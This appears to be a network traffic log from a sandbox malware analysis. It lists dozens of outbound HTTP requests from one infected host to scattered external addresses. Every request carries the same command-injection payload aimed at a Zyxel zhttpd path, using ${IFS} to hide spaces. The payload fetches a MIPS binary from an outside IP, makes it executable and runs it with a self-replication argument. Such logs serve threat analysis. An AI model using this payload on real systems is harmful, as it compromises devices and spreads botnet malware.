                                                Jan 12, 2024 18:16:36.768706083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7775192.168.2.2341452204.170.201.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768771887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7776192.168.2.235774040.128.8.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768810987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7777192.168.2.2347076172.136.92.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768862963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7778192.168.2.2335420161.251.77.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768874884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7779192.168.2.2341912172.232.57.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768920898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7780192.168.2.2353278170.190.145.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.768978119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7781192.168.2.2335204184.153.198.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769040108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7782192.168.2.2352734142.62.86.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769093037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7783192.168.2.235171248.242.38.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769133091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7784192.168.2.233829082.64.107.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769148111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7785192.168.2.233514861.148.34.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769212961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7786192.168.2.2346272188.133.183.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769247055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7787192.168.2.2357802149.138.188.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769279003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7788192.168.2.233858457.42.23.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769339085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7789192.168.2.235698470.35.224.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769383907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7790192.168.2.233765024.71.70.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769434929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7791192.168.2.2337314218.134.103.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769484043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7792192.168.2.2343916161.99.179.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769526005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7793192.168.2.2336860120.87.228.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769582033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7794192.168.2.233811670.35.233.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769659996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7795192.168.2.2351752178.198.254.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769681931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7796192.168.2.2350446196.190.129.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769716024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7797192.168.2.2348106205.26.108.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769728899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7798192.168.2.234531657.78.254.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769824028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7799192.168.2.235343242.224.71.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769826889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7800192.168.2.23460824.163.40.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769850969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7801192.168.2.2344140109.160.103.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769880056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7802192.168.2.234126288.55.146.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769901991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7803192.168.2.2339678178.11.50.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.769979954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7804192.168.2.233991289.209.234.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770030975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7805192.168.2.2344466150.171.245.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770109892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7806192.168.2.2347012220.181.169.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770137072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7807192.168.2.234433212.76.58.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770236015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7808192.168.2.2358068106.41.92.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770246029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7809192.168.2.233687249.153.253.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770332098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7810192.168.2.233794484.233.48.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770338058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7811192.168.2.233673069.63.119.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770390034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7812192.168.2.2353286140.233.223.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770464897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7813192.168.2.235418698.90.149.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770544052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7814192.168.2.2334530117.161.100.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770559072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7815192.168.2.235472636.106.148.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770592928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7816192.168.2.233800454.71.57.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770618916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7817192.168.2.235186273.65.194.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770678997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7818192.168.2.2350222216.190.188.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770726919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7819192.168.2.234666684.208.154.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770781994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7820192.168.2.233633851.242.129.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770812988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7821192.168.2.2337528158.109.102.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770849943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7822192.168.2.2345646113.237.72.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770873070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7823192.168.2.233603084.42.214.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770937920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7824192.168.2.2346996189.224.208.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.770976067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7825192.168.2.2346324138.73.223.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771020889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7826192.168.2.2347990126.216.65.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771066904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7827192.168.2.2335998168.192.243.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771100998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7828192.168.2.234005690.51.252.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771181107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7829192.168.2.234163023.26.83.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771219969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7830192.168.2.2348360188.38.100.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771265030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7831192.168.2.2349966213.120.204.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771316051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7832192.168.2.2340128211.127.86.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771354914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7833192.168.2.2337720177.4.130.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771415949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7834192.168.2.235722289.24.199.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771476984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7835192.168.2.2337466189.147.40.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771513939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7836192.168.2.235465024.205.69.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.771549940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7837192.168.2.234899654.66.102.158443
                                                TimestampBytes transferredDirectionData
